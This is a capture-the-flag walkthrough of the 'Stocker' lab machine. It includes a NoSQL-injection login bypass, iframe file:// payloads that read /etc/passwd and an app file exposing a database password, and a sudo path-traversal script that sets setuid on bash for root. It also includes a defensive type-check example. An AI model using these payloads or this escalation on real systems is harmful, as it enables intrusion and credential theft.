Scanning
> TARGET=10.10.11.196 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Domain: stocker.htb
- dirsearch
> dirsearch -u http://stocker.htb/
[20:07:21] 301 - 178B - /js -> http://stocker.htb/js/
[20:07:43] 301 - 178B - /css -> http://stocker.htb/css/
[20:07:47] 200 - 1KB - /favicon.ico
[20:07:48] 301 - 178B - /fonts -> http://stocker.htb/fonts/
[20:07:51] 301 - 178B - /img -> http://stocker.htb/img/
[20:07:51] 200 - 15KB - /index.html
[20:07:53] 403 - 564B - /js/
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://stocker.htb/" -H "Host: FUZZ.stocker.htb" --hh 178
000000019: 302 0 L 4 W 28 Ch "dev"
- Subdomain found: dev.stocker.htb
- The session cookie is named connect.sid, so the backend runs on Node.js.
- dirsearch
> dirsearch -u http://dev.stocker.htb/
[20:15:09] 200 - 3KB - /login
[20:15:09] 200 - 3KB - /login/
[20:15:10] 302 - 28B - /logout -> /login
[20:15:10] 302 - 28B - /logout/ -> /login
[20:15:30] 301 - 179B - /static -> /static/
- There is a login page at /login. Try a NoSQL injection bypass: change the Content-Type to application/json and send operator objects as the payload:
POST /login HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 27
Origin: http://dev.stocker.htb
Connection: close
Referer: http://dev.stocker.htb/login
Cookie: connect.sid=s%3AwgQp6npwjmE_RXpdT1CXYslntG-vy_zf.KjRNE5lJGDKFUv0mDK1A7Iryma2cm5yYJLN5kUpdDVE
Upgrade-Insecure-Requests: 1
{"username": {"$ne": null}, "password": {"$ne": null} }
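Added example, not code from the writeup or from the box itself: it shows why the payload above logs in when request-body fields are passed straight into the user query, and the type check that closes the hole. The user list is constructed and stands in for MongoDB so the snippet runs offline.

```javascript
// Constructed sample users; passwords are placeholder strings, not real hashes.
const users = [
  { username: "angoose", password: "placeholder-1" },
  { username: "admin", password: "placeholder-2" },
];

// Evaluate one field against a condition the way Mongo would for the two
// shapes exercised on this page: a plain string (equality) or an operator
// object such as {"$ne": null} smuggled in through a JSON body.
function matches(fieldValue, condition) {
  if (condition !== null && typeof condition === "object") {
    if ("$ne" in condition) return fieldValue !== condition.$ne;
    return false; // other operators are not modelled here
  }
  return fieldValue === condition;
}

// Vulnerable pattern: req.body.username / req.body.password go straight into
// the query, so {"$ne": null} matches any user whose fields are non-null.
// Returns the first matched user or null.
function vulnerableLogin(body) {
  const { username, password } = body;
  return (
    users.find(u => matches(u.username, username) && matches(u.password, password)) || null
  );
}

// Hardened pattern: credentials must be primitive strings before any query is
// built, so an operator object is rejected up front. The same check belongs in
// an Express handler before calling the model's findOne().
function hardenedLogin(body) {
  const { username, password } = body;
  if (typeof username !== "string" || typeof password !== "string") return null;
  return users.find(u => u.username === username && u.password === password) || null;
}

// The bypass body from the request above, as a JS object.
const bypassBody = { username: { $ne: null }, password: { $ne: null } };
```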
- This brings us to http://dev.stocker.htb/stock
user
- Add something to the cart and intercept the request to exploit the title field: injected HTML (XSS) is rendered with local origin, so it can read local files.
- Leak the contents of /etc/passwd with the payload:
payload: <iframe src=file:///etc/passwd height='800' width='800'></iframe>
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
- Leak the information in /var/www/dev/index.js with the payload:
payload: <iframe src=file:///var/www/dev/index.js height='800' width='800'></iframe>
const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1"
- Log in as angoose to get the user flag.
root
angoose@stocker:~$ sudo -l
[sudo] password for angoose:
Matching Defaults entries for angoose on stocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User angoose may run the following commands on stocker:
(ALL) /usr/bin/node /usr/local/scripts/*.js
- Create the exploit script evil.js. The sudo rule only matches /usr/local/scripts/*.js, but the wildcard does not stop path traversal, so the file can sit in the home directory and be reached as /usr/local/scripts/../../../home/angoose/evil.js (as in the run below).
// Run a shell command as the user sudo gives us (root): set the setuid/setgid
// bits on bash so that a later "bash -p" keeps root privileges.
const { exec } = require("child_process");
exec("chmod +s /usr/bin/bash", (error, stdout, stderr) => {
  if (error) {
    console.log(`error: ${error.message}`);
    return;
  }
  if (stderr) {
    console.log(`stderr: ${stderr}`);
    return;
  }
  console.log(`stdout: ${stdout}`);
});
- Run the script through sudo, then use the setuid bash to read the root flag
angoose@stocker:~$ touch evil.js
angoose@stocker:~$ vi evil.js
angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/evil.js
stdout:
angoose@stocker:~$ ls -ls /usr/bin/bash
1156 -rwsr-sr-x 1 root root 1183448 Apr 18 2022 /usr/bin/bash
angoose@stocker:~$ /usr/bin/bash -p
bash-5.0# cat /root/root.txt